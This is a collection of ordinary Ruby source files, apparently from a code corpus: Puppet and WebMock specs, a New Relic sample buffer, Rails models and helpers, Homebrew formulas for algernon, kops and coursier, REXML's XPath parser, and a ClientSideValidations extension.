it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad custom_fragment' do
let :params do
{
'docroot' => '/rspec/docroot',
'custom_fragment' => true,
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad access_logs' do
let :params do
{
'docroot' => '/rspec/docroot',
'access_logs' => '/var/log/somewhere',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'default of require all granted' do
let :params do
{
'docroot' => '/var/www/foo',
'directories' => [
{
'path' => '/var/www/foo/files',
'provider' => 'files',
},
],
}
end
it { is_expected.to compile }
it { is_expected.to contain_concat('25-rspec.example.com.conf') }
it { is_expected.to contain_concat__fragment('rspec.example.com-directories') }
# this works only with apache 2.4 and newer
if (facts[:os]['family'] == 'RedHat' && facts[:os]['release']['major'].to_i > 6) ||
(facts[:os]['name'] == 'SLES' && facts[:os]['release']['major'].to_i > 11)
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all granted$},
)
}
end
end
context 'require unmanaged' do
let :params do
{
'docroot' => '/var/www/foo',
'directories' => [
{
'path' => '/var/www/foo',
'require' => 'unmanaged',
},
],
}
end
it { is_expected.to compile }
it { is_expected.to contain_concat('25-rspec.example.com.conf') }
it { is_expected.to contain_concat__fragment('rspec.example.com-directories') }
it {
is_expected.not_to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all granted$},
)
}
end
describe 'redirectmatch_*' do
let :dparams do
{
docroot: '/rspec/docroot',
port: '84',
}
end
context 'status' do
let(:params) { dparams.merge(redirectmatch_status: '404') }
it { is_expected.to contain_class('apache::mod::alias') }
end
context 'dest' do
let(:params) { dparams.merge(redirectmatch_dest: 'http://other.example.com$1.jpg') }
it { is_expected.to contain_class('apache::mod::alias') }
end
context 'regexp' do
        let(:params) { dparams.merge(redirectmatch_regexp: '(.*)\.gif$') }
it { is_expected.to contain_class('apache::mod::alias') }
end
context 'none' do
let(:params) { dparams }
it { is_expected.not_to contain_class('apache::mod::alias') }
end
end
end
end
end
end
end
| 41.904087 | 156 | 0.466841 |
ed4fe6d6aa5f282885c59dbe7df1f50f0e44c7c4
| 77 |
require 'webmock/rspec'
WebMock.disable_net_connect!(allow_localhost: true)
| 19.25 | 51 | 0.831169 |
872a660c5040a9c9e94cdf03e5bd1239e20e1e56
| 2,924 |
# encoding: utf-8
# This file is distributed under New Relic's license terms.
# See https://github.com/newrelic/newrelic-ruby-agent/blob/main/LICENSE for complete details.
module NewRelic
module Agent
class Transaction
class TransactionSampleBuffer
attr_reader :samples
SINGLE_BUFFER_MAX = 20
NO_SAMPLES = [].freeze
def initialize
@samples = []
end
def enabled?
true
end
def reset!
@samples = []
end
def harvest_samples
@samples
ensure
reset!
end
def allow_sample?(sample)
true
end
def store(sample)
return unless enabled?
if allow_sample?(sample)
add_sample(sample)
truncate_samples_if_needed
end
end
def store_previous(previous_samples)
return unless enabled?
previous_samples.each do |sample|
add_sample(sample) if allow_sample?(sample)
end
truncate_samples_if_needed
end
def truncate_samples_if_needed
truncate_samples if full?
end
def full?
@samples.length >= max_capacity
end
# Capacity is the desired number of samples a buffer will hold. This
# can be user dictated via config if a feature wants.
#
# This value will be forcibly capped by the max_capacity
def capacity
raise NotImplementedError.new("TransactionSampleBuffer subclasses must provide a capacity override")
end
# Apply hard upper limit to the capacity to prevent users from
# consuming too much memory buffering TT's.
#
# A typical buffer should NOT override this method (although we do for
# odd things like dev-mode)
def max_capacity
capacity > SINGLE_BUFFER_MAX ? SINGLE_BUFFER_MAX : capacity
end
# Our default truncation strategy is to keep max_capacity
# worth of the longest samples. Override this method for alternate
# behavior.
#
# This doesn't use the more convenient #last and #sort_by to avoid
# additional array allocations (and abundant alliteration)
def truncate_samples
@samples.sort! { |a, b| a.duration <=> b.duration }
@samples.slice!(0..-(max_capacity + 1))
end
        # When pushing a scope, different sample buffers may want to know
        # what's happening so they can annotate the incoming nodes.
def visit_node(*)
# no-op
end
private
# If a buffer needs to modify an added sample, override this method.
# Bounds checking, allowing samples and truncation belongs elsewhere.
def add_sample(sample)
@samples << sample
end
end
end
end
end
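# Illustrative sketch, not part of the original file: a minimal concrete buffer
# showing how subclasses are expected to override `capacity`. The class name
# and the fixed capacity below are assumptions made for the example only.
module NewRelic
  module Agent
    class Transaction
      class ExampleSlowestSampleBuffer < TransactionSampleBuffer
        def capacity
          10 # max_capacity still caps this at SINGLE_BUFFER_MAX (20)
        end
      end
    end
  end
end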
| 27.847619 | 110 | 0.604993 |
d58e6c987e228e55e1738dad4d2df5d0ddf8f154
| 413 |
class User < ActiveRecord::Base
has_secure_password
validates :username, :password, presence: true
# ^ helper method built into sinatra that allows setting conditions for bad data being persisted to the database from controller actions.
validates :username, uniqueness: true #eliminates need for controller action validation on having unique usernames for database and users
has_many :cats
end
| 59 | 141 | 0.786925 |
5dfa8b124c624134b0ca98ab27cb03ec793d90d0
| 1,221 |
# frozen_string_literal: true
# Helper class for column sorting in Pagination.
#
# Examples:
#
# @direction = SortDirection.new(:asc)
# @direction.to_s # => "ASC"
# @direction.downcase # => 'asc'
# @direction.opposite # => 'DESC'
#
# SortDirection.new(:wrong).to_s # => 'ASC'
#
class SortDirection
##
# When given an unknown or nil direction, default to this value
DEFAULT_DIRECTION = "ASC"
##
# Possible sort direction values
DIRECTIONS = %w[ASC DESC]
##
# The direction represented as an uppercase, abbreviated String
attr_reader :direction
alias to_s direction
##
# The direction as uppercase
#
# Returns String
  delegate :upcase, to: :direction
##
# The direction as lowercase
#
# Returns String
delegate :downcase, to: :direction
# Initialize a new SortDirection
#
# direction - The direction (asc or desc) we want to sort results by
def initialize(direction = nil)
@direction = direction.to_s.upcase.presence_in(DIRECTIONS) || DEFAULT_DIRECTION
end
# The opposite direction to this one. Returns asc for desc, and desc for asc.
#
# Returns String
def opposite
@opposite ||= DIRECTIONS[DIRECTIONS.index(direction) - 1]
end
end
| 21.421053 | 83 | 0.687961 |
87cf691cf112c1b461425b83e957df0c9b1a2b4a
| 1,619 |
class Algernon < Formula
desc "Pure Go web server with Lua, Markdown, HTTP/2 and template support"
homepage "https://github.com/xyproto/algernon"
url "https://github.com/xyproto/algernon/archive/1.12.14.tar.gz"
sha256 "cab5b01923142e0326ea2a01797814bb2e8ea9f7c6c41a3ea0ae7df3b667e86e"
license "MIT"
version_scheme 1
head "https://github.com/xyproto/algernon.git", branch: "main"
livecheck do
url :stable
strategy :github_latest
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "0eaa6910677a3aa0a1be868af31c73e7390d420f41c7950e905d6d52556bde0b"
sha256 cellar: :any_skip_relocation, big_sur: "ffe7eed6b3576166e41b66beecdccc47aabed4644119190a1534ec8210fb25cc"
sha256 cellar: :any_skip_relocation, catalina: "57e11ff2b146da5e254189058ec5502bda66d7213996daf8846756cca5de38ec"
sha256 cellar: :any_skip_relocation, mojave: "c06af8b3677a3d46e7be0160533e8da8b7512b848a24105d498c0a9b1d381125"
sha256 cellar: :any_skip_relocation, x86_64_linux: "ccdca9ac607c215c4981e35dc13101c5acc0533edd1a5441bd3c874dea275b2a" # linuxbrew-core
end
depends_on "go" => :build
def install
system "go", "build", *std_go_args, "-mod=vendor"
bin.install "desktop/mdview"
end
test do
port = free_port
pid = fork do
exec "#{bin}/algernon", "-s", "-q", "--httponly", "--boltdb", "tmp.db",
"--addr", ":#{port}"
end
sleep 20
output = shell_output("curl -sIm3 -o- http://localhost:#{port}")
assert_match(/200 OK.*Server: Algernon/m, output)
ensure
Process.kill("HUP", pid)
end
end
| 36.795455 | 139 | 0.723904 |
edd11277353ff705a0cad917dc16f5063edb21d3
| 20,926 |
# frozen_string_literal: false
require 'rexml/namespace'
require 'rexml/xmltokens'
require 'rexml/attribute'
require 'rexml/syncenumerator'
require 'rexml/parsers/xpathparser'
class Object
# provides a unified +clone+ operation, for REXML::XPathParser
# to use across multiple Object types
def dclone
clone
end
end
class Symbol
# provides a unified +clone+ operation, for REXML::XPathParser
# to use across multiple Object types
def dclone ; self ; end
end
class Fixnum
# provides a unified +clone+ operation, for REXML::XPathParser
# to use across multiple Object types
def dclone ; self ; end
end
class Float
# provides a unified +clone+ operation, for REXML::XPathParser
# to use across multiple Object types
def dclone ; self ; end
end
class Array
# provides a unified +clone+ operation, for REXML::XPathParser
# to use across multiple Object+ types
def dclone
klone = self.clone
klone.clear
self.each{|v| klone << v.dclone}
klone
end
end
module REXML
# You don't want to use this class. Really. Use XPath, which is a wrapper
# for this class. Believe me. You don't want to poke around in here.
# There is strange, dark magic at work in this code. Beware. Go back! Go
# back while you still can!
class XPathParser
include XMLTokens
LITERAL = /^'([^']*)'|^"([^"]*)"/u
def initialize( )
@parser = REXML::Parsers::XPathParser.new
@namespaces = nil
@variables = {}
end
def namespaces=( namespaces={} )
Functions::namespace_context = namespaces
@namespaces = namespaces
end
def variables=( vars={} )
Functions::variables = vars
@variables = vars
end
def parse path, nodeset
path_stack = @parser.parse( path )
match( path_stack, nodeset )
end
def get_first path, nodeset
path_stack = @parser.parse( path )
first( path_stack, nodeset )
end
def predicate path, nodeset
path_stack = @parser.parse( path )
expr( path_stack, nodeset )
end
def []=( variable_name, value )
@variables[ variable_name ] = value
end
# Performs a depth-first (document order) XPath search, and returns the
# first match. This is the fastest, lightest way to return a single result.
#
# FIXME: This method is incomplete!
    def first( path, node )
return nil if path.size == 0
case path[0]
when :document
# do nothing
return first( path[1..-1], node )
when :child
for c in node.children
r = first( path[1..-1], c )
return r if r
end
when :qname
name = path[2]
if node.name == name
return node if path.size == 3
return first( path[3..-1], node )
else
return nil
end
when :descendant_or_self
r = first( path[1..-1], node )
return r if r
for c in node.children
r = first( path, c )
return r if r
end
when :node
return first( path[1..-1], node )
when :any
return first( path[1..-1], node )
end
return nil
end
def match( path_stack, nodeset )
r = expr( path_stack, nodeset )
r
end
private
# Returns a String namespace for a node, given a prefix
# The rules are:
#
# 1. Use the supplied namespace mapping first.
# 2. If no mapping was supplied, use the context node to look up the namespace
def get_namespace( node, prefix )
if @namespaces
return @namespaces[prefix] || ''
else
return node.namespace( prefix ) if node.node_type == :element
return ''
end
end
# Expr takes a stack of path elements and a set of nodes (either a Parent
# or an Array and returns an Array of matching nodes
ALL = [ :attribute, :element, :text, :processing_instruction, :comment ]
ELEMENTS = [ :element ]
def expr( path_stack, nodeset, context=nil )
node_types = ELEMENTS
return nodeset if path_stack.length == 0 || nodeset.length == 0
while path_stack.length > 0
if nodeset.length == 0
path_stack.clear
return []
end
case (op = path_stack.shift)
when :document
nodeset = [ nodeset[0].root_node ]
when :qname
prefix = path_stack.shift
name = path_stack.shift
nodeset.delete_if do |node|
# FIXME: This DOUBLES the time XPath searches take
ns = get_namespace( node, prefix )
!(node.node_type == :element and
node.name == name and
node.namespace == ns )
end
node_types = ELEMENTS
when :any
nodeset.delete_if { |node| !node_types.include?(node.node_type) }
when :self
# This space left intentionally blank
when :processing_instruction
target = path_stack.shift
nodeset.delete_if do |node|
(node.node_type != :processing_instruction) or
( target!='' and ( node.target != target ) )
end
when :text
nodeset.delete_if { |node| node.node_type != :text }
when :comment
nodeset.delete_if { |node| node.node_type != :comment }
when :node
# This space left intentionally blank
node_types = ALL
when :child
new_nodeset = []
nt = nil
nodeset.each do |node|
nt = node.node_type
new_nodeset += node.children if nt == :element or nt == :document
end
nodeset = new_nodeset
node_types = ELEMENTS
when :literal
return path_stack.shift
when :attribute
new_nodeset = []
case path_stack.shift
when :qname
prefix = path_stack.shift
name = path_stack.shift
for element in nodeset
if element.node_type == :element
attrib = element.attribute( name, get_namespace(element, prefix) )
new_nodeset << attrib if attrib
end
end
when :any
for element in nodeset
if element.node_type == :element
new_nodeset += element.attributes.to_a
end
end
end
nodeset = new_nodeset
when :parent
nodeset = nodeset.collect{|n| n.parent}.compact
#nodeset = expr(path_stack.dclone, nodeset.collect{|n| n.parent}.compact)
node_types = ELEMENTS
when :ancestor
new_nodeset = []
nodeset.each do |node|
while node.parent
node = node.parent
new_nodeset << node unless new_nodeset.include? node
end
end
nodeset = new_nodeset
node_types = ELEMENTS
when :ancestor_or_self
new_nodeset = []
nodeset.each do |node|
if node.node_type == :element
new_nodeset << node
while ( node.parent )
node = node.parent
new_nodeset << node unless new_nodeset.include? node
end
end
end
nodeset = new_nodeset
node_types = ELEMENTS
when :predicate
new_nodeset = []
subcontext = { :size => nodeset.size }
pred = path_stack.shift
nodeset.each_with_index { |node, index|
subcontext[ :node ] = node
subcontext[ :index ] = index+1
pc = pred.dclone
result = expr( pc, [node], subcontext )
result = result[0] if result.kind_of? Array and result.length == 1
if result.kind_of? Numeric
new_nodeset << node if result == (index+1)
elsif result.instance_of? Array
if result.size > 0 and result.inject(false) {|k,s| s or k}
new_nodeset << node if result.size > 0
end
else
new_nodeset << node if result
end
}
nodeset = new_nodeset
=begin
predicate = path_stack.shift
ns = nodeset.clone
result = expr( predicate, ns )
if result.kind_of? Array
nodeset = result.zip(ns).collect{|m,n| n if m}.compact
else
nodeset = result ? nodeset : []
end
=end
when :descendant_or_self
rv = descendant_or_self( path_stack, nodeset )
path_stack.clear
nodeset = rv
node_types = ELEMENTS
when :descendant
results = []
nt = nil
nodeset.each do |node|
nt = node.node_type
results += expr( path_stack.dclone.unshift( :descendant_or_self ),
node.children ) if nt == :element or nt == :document
end
nodeset = results
node_types = ELEMENTS
when :following_sibling
results = []
nodeset.each do |node|
next if node.parent.nil?
all_siblings = node.parent.children
current_index = all_siblings.index( node )
following_siblings = all_siblings[ current_index+1 .. -1 ]
results += expr( path_stack.dclone, following_siblings )
end
nodeset = results
when :preceding_sibling
results = []
nodeset.each do |node|
next if node.parent.nil?
all_siblings = node.parent.children
current_index = all_siblings.index( node )
preceding_siblings = all_siblings[ 0, current_index ].reverse
results += preceding_siblings
end
nodeset = results
node_types = ELEMENTS
when :preceding
new_nodeset = []
nodeset.each do |node|
new_nodeset += preceding( node )
end
nodeset = new_nodeset
node_types = ELEMENTS
when :following
new_nodeset = []
nodeset.each do |node|
new_nodeset += following( node )
end
nodeset = new_nodeset
node_types = ELEMENTS
when :namespace
new_nodeset = []
prefix = path_stack.shift
nodeset.each do |node|
if (node.node_type == :element or node.node_type == :attribute)
if @namespaces
namespaces = @namespaces
elsif (node.node_type == :element)
namespaces = node.namespaces
else
              namespaces = node.element.namespaces
end
if (node.namespace == namespaces[prefix])
new_nodeset << node
end
end
end
nodeset = new_nodeset
when :variable
var_name = path_stack.shift
return @variables[ var_name ]
# :and, :or, :eq, :neq, :lt, :lteq, :gt, :gteq
# TODO: Special case for :or and :and -- not evaluate the right
# operand if the left alone determines result (i.e. is true for
# :or and false for :and).
when :eq, :neq, :lt, :lteq, :gt, :gteq, :or
left = expr( path_stack.shift, nodeset.dup, context )
right = expr( path_stack.shift, nodeset.dup, context )
res = equality_relational_compare( left, op, right )
return res
when :and
left = expr( path_stack.shift, nodeset.dup, context )
return [] unless left
if left.respond_to?(:inject) and !left.inject(false) {|a,b| a | b}
return []
end
right = expr( path_stack.shift, nodeset.dup, context )
res = equality_relational_compare( left, op, right )
return res
when :div
left = Functions::number(expr(path_stack.shift, nodeset, context)).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context)).to_f
return (left / right)
when :mod
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left % right)
when :mult
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left * right)
when :plus
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left + right)
when :minus
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left - right)
when :union
left = expr( path_stack.shift, nodeset, context )
right = expr( path_stack.shift, nodeset, context )
return (left | right)
when :neg
res = expr( path_stack, nodeset, context )
return -(res.to_f)
when :not
when :function
func_name = path_stack.shift.tr('-','_')
arguments = path_stack.shift
subcontext = context ? nil : { :size => nodeset.size }
res = []
cont = context
nodeset.each_with_index { |n, i|
if subcontext
subcontext[:node] = n
subcontext[:index] = i
cont = subcontext
end
arg_clone = arguments.dclone
args = arg_clone.collect { |arg|
expr( arg, [n], cont )
}
Functions.context = cont
res << Functions.send( func_name, *args )
}
return res
end
end # while
return nodeset
end
##########################################################
# FIXME
# The next two methods are BAD MOJO!
# This is my achilles heel. If anybody thinks of a better
# way of doing this, be my guest. This really sucks, but
# it is a wonder it works at all.
# ########################################################
def descendant_or_self( path_stack, nodeset )
rs = []
d_o_s( path_stack, nodeset, rs )
document_order(rs.flatten.compact)
#rs.flatten.compact
end
def d_o_s( p, ns, r )
nt = nil
ns.each_index do |i|
n = ns[i]
x = expr( p.dclone, [ n ] )
nt = n.node_type
d_o_s( p, n.children, x ) if nt == :element or nt == :document and n.children.size > 0
r.concat(x) if x.size > 0
end
end
# Reorders an array of nodes so that they are in document order
# It tries to do this efficiently.
#
# FIXME: I need to get rid of this, but the issue is that most of the XPath
# interpreter functions as a filter, which means that we lose context going
# in and out of function calls. If I knew what the index of the nodes was,
# I wouldn't have to do this. Maybe add a document IDX for each node?
# Problems with mutable documents. Or, rewrite everything.
def document_order( array_of_nodes )
new_arry = []
array_of_nodes.each { |node|
node_idx = []
np = node.node_type == :attribute ? node.element : node
while np.parent and np.parent.node_type == :element
node_idx << np.parent.index( np )
np = np.parent
end
new_arry << [ node_idx.reverse, node ]
}
new_arry.sort{ |s1, s2| s1[0] <=> s2[0] }.collect{ |s| s[1] }
end
def recurse( nodeset, &block )
for node in nodeset
yield node
recurse( node, &block ) if node.node_type == :element
end
end
# Builds a nodeset of all of the preceding nodes of the supplied node,
# in reverse document order
# preceding:: includes every element in the document that precedes this node,
# except for ancestors
def preceding( node )
ancestors = []
p = node.parent
while p
ancestors << p
p = p.parent
end
acc = []
p = preceding_node_of( node )
while p
if ancestors.include? p
ancestors.delete(p)
else
acc << p
end
p = preceding_node_of( p )
end
acc
end
def preceding_node_of( node )
psn = node.previous_sibling_node
if psn.nil?
if node.parent.nil? or node.parent.class == Document
return nil
end
return node.parent
#psn = preceding_node_of( node.parent )
end
while psn and psn.kind_of? Element and psn.children.size > 0
psn = psn.children[-1]
end
psn
end
def following( node )
acc = []
p = next_sibling_node( node )
while p
acc << p
p = following_node_of( p )
end
acc
end
def following_node_of( node )
if node.kind_of? Element and node.children.size > 0
return node.children[0]
end
return next_sibling_node(node)
end
def next_sibling_node(node)
psn = node.next_sibling_node
while psn.nil?
if node.parent.nil? or node.parent.class == Document
return nil
end
node = node.parent
psn = node.next_sibling_node
end
return psn
end
def norm b
case b
when true, false
return b
when 'true', 'false'
return Functions::boolean( b )
when /^\d+(\.\d+)?$/
return Functions::number( b )
else
return Functions::string( b )
end
end
def equality_relational_compare( set1, op, set2 )
if set1.kind_of? Array and set2.kind_of? Array
if set1.size == 1 and set2.size == 1
set1 = set1[0]
set2 = set2[0]
elsif set1.size == 0 or set2.size == 0
nd = set1.size==0 ? set2 : set1
rv = nd.collect { |il| compare( il, op, nil ) }
return rv
else
res = []
SyncEnumerator.new( set1, set2 ).each { |i1, i2|
i1 = norm( i1 )
i2 = norm( i2 )
res << compare( i1, op, i2 )
}
return res
end
end
# If one is nodeset and other is number, compare number to each item
# in nodeset s.t. number op number(string(item))
# If one is nodeset and other is string, compare string to each item
# in nodeset s.t. string op string(item)
# If one is nodeset and other is boolean, compare boolean to each item
# in nodeset s.t. boolean op boolean(item)
if set1.kind_of? Array or set2.kind_of? Array
if set1.kind_of? Array
a = set1
b = set2
else
a = set2
b = set1
end
case b
when true, false
return a.collect {|v| compare( Functions::boolean(v), op, b ) }
when Numeric
return a.collect {|v| compare( Functions::number(v), op, b )}
when /^\d+(\.\d+)?$/
b = Functions::number( b )
return a.collect {|v| compare( Functions::number(v), op, b )}
else
b = Functions::string( b )
return a.collect { |v| compare( Functions::string(v), op, b ) }
end
else
# If neither is nodeset,
# If op is = or !=
# If either boolean, convert to boolean
# If either number, convert to number
# Else, convert to string
# Else
# Convert both to numbers and compare
s1 = set1.to_s
s2 = set2.to_s
if s1 == 'true' or s1 == 'false' or s2 == 'true' or s2 == 'false'
set1 = Functions::boolean( set1 )
set2 = Functions::boolean( set2 )
else
if op == :eq or op == :neq
if s1 =~ /^\d+(\.\d+)?$/ or s2 =~ /^\d+(\.\d+)?$/
set1 = Functions::number( s1 )
set2 = Functions::number( s2 )
else
set1 = Functions::string( set1 )
set2 = Functions::string( set2 )
end
else
set1 = Functions::number( set1 )
set2 = Functions::number( set2 )
end
end
return compare( set1, op, set2 )
end
return false
end
def compare a, op, b
case op
when :eq
a == b
when :neq
a != b
when :lt
a < b
when :lteq
a <= b
when :gt
a > b
when :gteq
a >= b
when :and
a and b
when :or
a or b
else
false
end
end
end
end
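# Illustrative usage sketch (not part of the original file). As the class
# comment warns, you normally go through the REXML::XPath wrapper instead of
# driving XPathParser directly:
#
#   require 'rexml/document'
#   doc = REXML::Document.new('<a><b/><c/><b/></a>')
#   REXML::XPath.match(doc, '//b').size # => 2
#   REXML::XPath.first(doc, '//c').name # => "c"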
| 29.68227 | 94 | 0.545637 |
62aa2cbc22a4bf006cdeaf313a5023d641f889f3
| 145 |
# frozen_string_literal: true
class ContractTemplateSerializer < ActiveModel::Serializer
attributes :id, :template_file, :template_name
end
| 24.166667 | 58 | 0.813793 |
280f27e928129968cef0585f7eea1c79e20d15e7
| 160 |
module FullMessagesHelper
def full_messages(post)
post.errors.full_messages.each do |message|
message # rubocop:disable Lint/Void
end
end
end
| 20 | 47 | 0.7375 |
9130663767f165bc75520c6aef0efc1d990d62ec
| 52 |
json.partial! "my_blogs/my_blog", my_blog: @my_blog
| 26 | 51 | 0.769231 |
e8aec593b9f269d86b1b59526c54f895ce76eb9d
| 1,266 |
class Kops < Formula
desc "Production Grade K8s Installation, Upgrades, and Management"
homepage "https://github.com/kubernetes/kops"
url "https://github.com/kubernetes/kops/archive/1.12.2.tar.gz"
sha256 "e453bfd39a8bd079a14cf8d8c1b22d1429ccd4f5701b55f3612528263aeb97e6"
head "https://github.com/kubernetes/kops.git"
bottle do
cellar :any_skip_relocation
sha256 "f8edc1b5c421fc18a911db6210e2e7c34158c3c9ebb7b5e6afd06acfd3325e78" => :mojave
sha256 "93ec062792caac6be68f00605d9dcecf69a824dd2bca89ff2eda85d8cd54a186" => :high_sierra
sha256 "57e12bf567e1340d0f8fd82fd025479ebc3d6527215252cd42eedf164ec11e2b" => :sierra
end
depends_on "go" => :build
depends_on "kubernetes-cli"
def install
ENV["VERSION"] = version unless build.head?
ENV["GOPATH"] = buildpath
kopspath = buildpath/"src/k8s.io/kops"
kopspath.install Dir["*"]
system "make", "-C", kopspath
bin.install("bin/kops")
# Install bash completion
output = Utils.popen_read("#{bin}/kops completion bash")
(bash_completion/"kops").write output
# Install zsh completion
output = Utils.popen_read("#{bin}/kops completion zsh")
(zsh_completion/"_kops").write output
end
test do
system "#{bin}/kops", "version"
end
end
| 32.461538 | 93 | 0.734597 |
6a09a9b176b9cd9a13f5f17a5035780a5344d9b2
| 88 |
module GithubApi
module V4
class Client
VERSION = '0.2.0'
end
end
end
| 11 | 23 | 0.602273 |
7a1f6c11f40b570dce58dfc741e48f78b23d2238
| 415 |
require File.expand_path('../../../../spec_helper', __FILE__)
require 'mathn'
ruby_version_is '1.9' do
describe 'Kernel#Rational' do
it 'returns an Integer if denominator divides numerator evenly' do
Rational(42,6).should == 7
Rational(42,6).should be_kind_of(Fixnum)
Rational(bignum_value,1).should == bignum_value
Rational(bignum_value,1).should be_kind_of(Bignum)
end
end
end
| 31.923077 | 70 | 0.706024 |
182e082bc5f9f29f55dda44170c1b00a8bec83ba
| 125 |
namespace :refresh do
task :public_db, [:force] => :environment do |t|
Util::DbManager.new.refresh_public_db
end
end
| 20.833333 | 50 | 0.712 |
87c97c677ea47e08e06b4f2955345b88e9036ecb
| 266 |
# frozen_string_literal: true
Rails.application.routes.draw do
get 'welcome/ins'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
resources :articles do
resources :comments
end
root 'welcome#ins'
end
| 24.181818 | 101 | 0.755639 |
26eac74212cf4ad47c785a9920f831bf53c78f01
| 129 |
class AddQuestionListToMedium < ActiveRecord::Migration[5.1]
def change
add_column :media, :question_list, :text
end
end
| 21.5 | 60 | 0.75969 |
ff5bf971c5f8a794dba8e81ea86fe0248b36f7db
| 958 |
require "minitest_helper"
class NewsletterControllerTest < ActionController::TestCase
def test_subscribe_to_discussion
mock = MiniTest::Mock.new
params = ActionController::Parameters.new('email' => '[email protected]').permit!
mock.expect :call, nil, [params]
ZenspiderSubscriber.stub :subscribe_to_discussion, mock do
post :subscribe, params: { :subscribe => {:person => {:email => '[email protected]'}, :subscribe_to_discussion => "1"} }
end
assert_mock mock
assert_redirected_to join_us_path
end
def test_subscribe_to_jobs
mock = MiniTest::Mock.new
params = ActionController::Parameters.new('email' => '[email protected]').permit!
mock.expect :call, nil, [params]
ZenspiderSubscriber.stub :subscribe_to_jobs, mock do
post :subscribe, params: { :subscribe => {:person => {:email => '[email protected]'}, :subscribe_to_jobs => "1"} }
end
assert_mock mock
assert_redirected_to join_us_path
end
end
| 29.9375 | 120 | 0.699374 |
b9f5763a5f7f405d3b302778593dbd6894978ef0
| 891 |
class Coursier < Formula
desc "Pure Scala Artifact Fetching"
homepage "https://get-coursier.io/"
url "https://github.com/coursier/coursier/releases/download/v2.1.0-M5/coursier.jar"
version "2.1.0-M5"
sha256 "4e9041524151a4213e71a6d76daae41307b5aeaed643257188618f1d99e8486d"
license "Apache-2.0"
livecheck do
url :stable
regex(/^v?(\d+(?:\.\d+)+(?:-M\d+)?)$/i)
end
bottle do
sha256 cellar: :any_skip_relocation, all: "a038325f8ddd5715b495a8af5a1880b1bec056a46f622c123516a7bd8d1da103"
end
depends_on "openjdk"
def install
(libexec/"bin").install "coursier.jar"
chmod 0755, libexec/"bin/coursier.jar"
(bin/"coursier").write_env_script libexec/"bin/coursier.jar", Language::Java.overridable_java_home_env
end
test do
system bin/"coursier", "list"
assert_match "scalafix", shell_output("#{bin}/coursier search scalafix")
end
end
| 28.741935 | 112 | 0.722783 |
abfeda960ff547e7cd001d29e2671454e07b7657
| 5,225 |
# frozen_string_literal: true
require 'client_side_validations/core_ext'
require 'client_side_validations/extender'
require 'client_side_validations/active_model/conditionals'
module ClientSideValidations
module ActiveModel
module Validator
def client_side_hash(model, attribute, _force = nil)
build_client_side_hash(model, attribute, options.dup)
end
def copy_conditional_attributes(attribute_to, attribute_from)
%i[if unless].each { |key| attribute_to[key] = attribute_from[key] if attribute_from[key].present? }
end
private
def build_client_side_hash(model, attribute, options)
{ message: model.errors.generate_message(attribute, message_type, options) }.merge(options.except(*callbacks_options - %i[allow_blank if unless]))
end
def message_type
kind
end
def callbacks_options
if defined?(::ActiveModel::Errors::CALLBACKS_OPTIONS)
::ActiveModel::Errors::CALLBACKS_OPTIONS
else
::ActiveModel::Error::CALLBACKS_OPTIONS
end
end
end
module Validations
include ClientSideValidations::ActiveModel::Conditionals
ATTRIBUTES_DENYLIST = [nil, :block].freeze
def client_side_validation_hash(force = nil)
_validators.inject({}) do |attr_hash, attr|
next attr_hash if ATTRIBUTES_DENYLIST.include?(attr[0])
validator_hash = validator_hash_for(attr, force)
if validator_hash.present?
attr_hash.merge!(attr[0] => validator_hash)
else
attr_hash
end
end
end
private
def validator_hash_for(attr, force)
attr[1].each_with_object(Hash.new { |h, k| h[k] = [] }) do |validator, kind_hash|
next unless can_use_for_client_side_validation?(attr[0], validator, force)
client_side_hash = validator.client_side_hash(self, attr[0], extract_force_option(attr[0], force))
if client_side_hash
kind_hash[validator.kind] << client_side_hash.except(:on, :if, :unless)
end
end
end
def extract_force_option(attr, force)
case force
when FalseClass, TrueClass, NilClass
force
when Hash
extract_force_option(nil, force[attr])
end
end
def can_use_for_client_side_validation?(attr, validator, force)
return false if validator_turned_off?(attr, validator, force)
result = check_new_record(validator)
result &&= validator.kind != :block
if validator.options[:if] || validator.options[:unless]
check_conditionals attr, validator, force
else
result
end
end
# Yeah yeah, #new_record? is not part of ActiveModel :p
def check_new_record(validator)
(respond_to?(:new_record?) && validator.options[:on] == (new_record? ? :create : :update)) || validator.options[:on].nil?
end
def will_save_change?(options)
options.is_a?(Symbol) && (options.to_s.end_with?('changed?') || options.to_s.start_with?('will_save_change_to'))
end
def check_conditionals(attr, validator, force)
return true if validator.options[:if] && will_save_change?(validator.options[:if])
result = can_force_validator?(attr, validator, force)
if validator.options[:if]
result &&= run_conditionals(validator.options[:if], :if)
end
if validator.options[:unless]
result &&= run_conditionals(validator.options[:unless], :unless)
end
result
end
def validator_turned_off?(attr, validator, force)
return true if ::ClientSideValidations::Config.disabled_validators.include?(validator.kind)
case force
when FalseClass
true
when Hash
case force[attr]
when FalseClass
true
when Hash
force[attr][validator.kind] == false
else
false
end
else
false
end
end
def can_force_validator?(attr, validator, force)
case force
when TrueClass
true
when Hash
case force[attr]
when TrueClass
true
when Hash
force[attr][validator.kind]
else
false
end
else
false
end
end
end
module EnumerableValidator
def client_side_hash(model, attribute, force = nil)
options = self.options.dup
if options[:in].respond_to?(:call)
return unless force
options[:in] = options[:in].call(model)
end
hash = build_client_side_hash(model, attribute, options)
if hash[:in].is_a?(Range)
hash[:range] = hash[:in]
hash.delete(:in)
end
hash
end
end
end
end
ActiveModel::Validator.include ClientSideValidations::ActiveModel::Validator
ActiveModel::Validations.include ClientSideValidations::ActiveModel::Validations
ClientSideValidations::Extender.extend 'ActiveModel', %w[Absence Acceptance Exclusion Format Inclusion Length Numericality Presence]
